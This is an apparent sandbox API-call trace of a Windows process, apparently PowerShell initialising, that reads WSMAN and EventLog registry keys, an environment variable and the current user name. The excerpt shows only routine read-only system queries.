	[0225.752] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd607e83f, Data2=0x9f99, Data3=0x4b5d, Data4=([0]=0xa7, [1]=0x98, [2]=0x7e, [3]=0xb4, [4]=0x6e, [5]=0x53, [6]=0xd0, [7]=0x34))) returned 0x0
	[0225.752] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x61884733, Data2=0x72da, Data3=0x44e5, Data4=([0]=0xae, [1]=0x91, [2]=0xda, [3]=0x89, [4]=0x4e, [5]=0x2d, [6]=0x38, [7]=0x49))) returned 0x0
	[0225.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0225.769] GetLastError () returned 0x57
	[0225.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0225.770] GetLastError () returned 0x57
	[0225.790] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xaea2c | out: phkResult=0xaea2c*=0x358) returned 0x0
	[0225.791] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xaea7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xaea80, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xaea7c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xaea80*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0225.792] RegEnumValueW (in: hKey=0x358, dwIndex=0x0, lpValueName=0x3582a0, lpcchValueName=0xaeaa4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xaeaa4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0225.792] RegEnumValueW (in: hKey=0x358, dwIndex=0x1, lpValueName=0x3582a0, lpcchValueName=0xaeaa4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xaeaa4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0225.792] RegQueryValueExW (in: hKey=0x358, lpValueName="StackVersion", lpReserved=0x0, lpType=0xaea84, lpData=0x0, lpcbData=0xaea80*=0x0 | out: lpType=0xaea84*=0x1, lpData=0x0, lpcbData=0xaea80*=0x8) returned 0x0
	[0225.792] RegQueryValueExW (in: hKey=0x358, lpValueName="StackVersion", lpReserved=0x0, lpType=0xaea84, lpData=0x3582a0, lpcbData=0xaea80*=0x8 | out: lpType=0xaea84*=0x1, lpData="2.0", lpcbData=0xaea80*=0x8) returned 0x0
	[0225.888] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9e8 | out: phkResult=0xae9e8*=0x32c) returned 0x0
	[0225.888] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xaea38, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xaea3c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xaea38*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xaea3c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0225.888] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x3582a0, lpcchValueName=0xaea60, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xaea60, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0225.888] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x3582a0, lpcchValueName=0xaea60, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xaea60, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0225.888] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xaea40, lpData=0x0, lpcbData=0xaea3c*=0x0 | out: lpType=0xaea40*=0x1, lpData=0x0, lpcbData=0xaea3c*=0x8) returned 0x0
	[0225.888] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xaea40, lpData=0x3582a0, lpcbData=0xaea3c*=0x8 | out: lpType=0xaea40*=0x1, lpData="2.0", lpcbData=0xaea3c*=0x8) returned 0x0
	[0225.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.897] GetLastError () returned 0xcb
	[0225.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.900] GetLastError () returned 0xcb
	[0226.019] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9a8 | out: phkResult=0xae9a8*=0x330) returned 0x0
	[0226.019] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xaea10, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xaea0c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xaea10*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xaea0c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.022] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.022] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.022] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.022] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.022] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.023] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.023] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.023] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.023] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x3582a0, lpcchName=0xaea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xaea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.024] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x334) returned 0x0
	[0226.024] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.024] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x354) returned 0x0
	[0226.024] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.024] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x360) returned 0x0
	[0226.025] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.025] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x364) returned 0x0
	[0226.025] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.025] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x368) returned 0x0
	[0226.026] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.026] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x36c) returned 0x0
	[0226.026] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.026] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x370) returned 0x0
	[0226.026] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.027] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x374) returned 0x0
	[0226.027] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x0) returned 0x2
	[0226.027] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x378) returned 0x0
	[0226.027] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9d8 | out: phkResult=0xae9d8*=0x37c) returned 0x0
	[0226.027] RegCloseKey (hKey=0x37c) returned 0x0
	[0226.028] RegCloseKey (hKey=0x330) returned 0x0
	[0226.029] RegCloseKey (hKey=0x378) returned 0x0
	[0226.037] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.039] GetLastError () returned 0x3
	[0226.040] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.199] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae98c | out: phkResult=0xae98c*=0x330) returned 0x0
	[0226.199] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae9f4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae9f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae9f4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae9f0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.199] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.200] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.200] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.200] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.200] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.200] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.201] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.201] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.201] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.201] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x37c) returned 0x0
	[0226.201] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.311] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x380) returned 0x0
	[0226.311] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.311] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x384) returned 0x0
	[0226.311] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.312] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x388) returned 0x0
	[0226.312] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.312] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x38c) returned 0x0
	[0226.312] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.313] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x390) returned 0x0
	[0226.313] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.313] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x394) returned 0x0
	[0226.313] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.313] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x398) returned 0x0
	[0226.314] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.314] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x39c) returned 0x0
	[0226.314] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3a0) returned 0x0
	[0226.314] RegCloseKey (hKey=0x3a0) returned 0x0
	[0226.314] RegCloseKey (hKey=0x330) returned 0x0
	[0226.315] RegCloseKey (hKey=0x39c) returned 0x0
	[0226.315] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae98c | out: phkResult=0xae98c*=0x39c) returned 0x0
	[0226.315] RegQueryInfoKeyW (in: hKey=0x39c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae9f4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae9f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae9f4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae9f0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.315] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x0, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.315] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x1, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.316] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x2, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.316] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x3, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.316] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x4, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.316] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x5, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.316] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x6, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.317] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x7, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.317] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x8, lpName=0x3582a0, lpcchName=0xaea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xaea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0226.317] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x330) returned 0x0
	[0226.317] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.318] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3a0) returned 0x0
	[0226.318] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.318] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3a4) returned 0x0
	[0226.318] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.318] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3a8) returned 0x0
	[0226.319] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.319] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3ac) returned 0x0
	[0226.319] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.319] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3b0) returned 0x0
	[0226.319] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.320] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3b4) returned 0x0
	[0226.320] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x0) returned 0x2
	[0226.320] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae9bc | out: phkResult=0xae9bc*=0x3b8) returned 0x0
